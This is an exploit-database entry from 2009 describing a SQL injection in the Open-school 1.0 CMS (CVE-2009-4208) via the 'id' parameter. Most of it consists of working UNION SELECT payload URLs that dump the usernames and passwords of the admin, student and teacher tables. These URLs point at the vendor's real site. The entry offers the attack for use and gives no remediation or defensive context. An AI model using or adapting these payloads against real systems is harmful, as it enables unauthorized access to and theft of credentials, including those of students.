Open-school 1.0 - 'id' SQL Injection

Author: OzX
type: webapps
platform: php
port: 
date_added: 2009-05-31  
date_updated:   
verified: 1  
codes: OSVDB-60786;CVE-2009-4208  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8839.txt  
Cms : Open-school
Version : 1.0
Archivo : Index.php
Parametro : id
Sitio :http://open-school.org
Url Vulnz :http://site.com/index.php?module=os_news&view=show&id=[SQLI]

Demo Injection:

Admin (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins

Students (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students

Teachers (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

# milw0rm.com [2009-06-01]